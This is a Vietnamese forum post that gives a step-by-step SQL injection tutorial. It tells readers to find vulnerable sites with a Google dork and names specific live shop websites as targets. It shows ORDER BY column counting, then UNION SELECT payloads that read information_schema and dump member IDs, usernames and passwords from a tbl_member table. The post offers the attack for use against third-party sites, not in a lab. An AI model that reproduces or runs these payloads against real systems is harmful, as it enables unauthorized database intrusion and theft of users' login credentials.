SQL Injection acttack

  • Thông báo:
    Tham gia nhóm Bạn Là IT Community để học hỏi kinh nghiệm và giao lưu với diễn đàn bạn nhé 
    Xin trân trọng cảm ơn

vũ hồ

Well-Known Member
21/04/2016
108
21
28
25
Sa Đéc. Đồng Tháp
SQL Injection
công cụ cần có:
- firefox : https://www.mozilla.org/vi/firefox/...4yCciCVaumwa5Lrsq7vFyrxZnrYGEi2emMaAi0U8P8HAQ
- hackbar : https://addons.mozilla.org/vi/firefox/addon/hackbar/
thực hiện:
tìm 1 trang web trên google ( gợi ý nhập code này vào google" inurl: product_detail id= site vn " )
tôi sẽ sử dụng trang web này để thực hiện : http://aoquangiare.com/?frame=product_detail&id=253
upload_2016-6-11_13-23-3.png
mở hackbar lên
upload_2016-6-11_13-22-29.png
nhập code vào
+...(... này là link trang web bạn muốn tấn công ) order by ...-- - ( lúc này nhập từ 1 tới 20, xem xem có còn hiển thị nội dung không )
ví dụ:
tôi nhập như sau : http://aoquangiare.com/?frame=product_detail&id=253 order by 14 rồi tôi nhấn excute thì trang web vẫn hiện nội dung !!!
upload_2016-6-11_13-24-53.png
nhưng khi tôi thay số 14 thành 15 thì trang web không hiện lên nội dung nữa !!!
upload_2016-6-11_13-25-33.png
vậy có 14 cột trong trang web đó !!!
sau đó chúng ta tìm lỗi từng cột trong trang đó bằng cách thay chữ order by thành UNION SELECT rồi nhấn tiếp tục theo hình dưới:

upload_2016-6-11_13-28-47.png

rồi nhập số cột bạn đã tìm được lúc nảy. như tôi đã tìm được 14 cột và nhập vào đó số 14 và sẽ hiện lên được dòng như sau:
http://huonglieuminhkien.com/?php=product_detail&id=244 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
và các bạn phải thêm vào dấu - trước số 244 và -- sau số 14 rồi excute
upload_2016-6-11_13-30-3.png
vậy là cột số 3 và số 6 lỗi
khai thác lỗi :
tôi thay số 3 thành: unhex(hex(group_concat(table_name))) và sẽ có dạng như sau
UNION SELECT 1,2,unhex(hex(group_concat(table_name))),4,5,6,7,8,9,10,11,12,13,14 FROM information_schema.tables Where table_schema=database()--
lấy 1 cái table nào đó (vd tbl_member)
UNION SELECT 1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12,13,14 FROM information_schema.columns Where table_name=tbl_member--
lưu ý các bạn bôi đen tbl_member r làm theo sau (sql=> mysql =>mysql char)
upload_2016-6-11_13-41-4.png
các dòng khác các bạn không nên quan tâm các dòng khác chỉ cần quần tâm id, uid, pwd thôi!!!
nhập lệnh sau: UNION SELECT 1,2,unhex(hex(group_concat(member_id,0x3a,uid,0x3a,pwd))),4,5,6,7,8,9,10,11,12,13,14 FROM tbl_member--
các bạn sẽ được pass và username đăng nhậppp !!!
 

Đính kèm

  • upload_2016-6-11_13-21-38.png
    upload_2016-6-11_13-21-38.png
    163.6 KB · Lượt xem: 386
Sửa lần cuối bởi điều hành viên: